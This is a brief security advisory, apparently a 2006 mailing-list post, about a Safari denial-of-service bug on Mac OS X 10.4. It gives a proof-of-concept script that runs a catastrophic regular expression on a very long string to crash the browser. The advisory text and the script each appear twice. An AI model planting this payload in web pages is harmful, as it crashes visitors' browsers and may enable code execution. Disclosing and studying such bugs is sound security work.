jbh_cg@yahoo.fr
16/11/06, 02:41
The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4.
A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.
<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);
</script>
A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.
<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);
</script>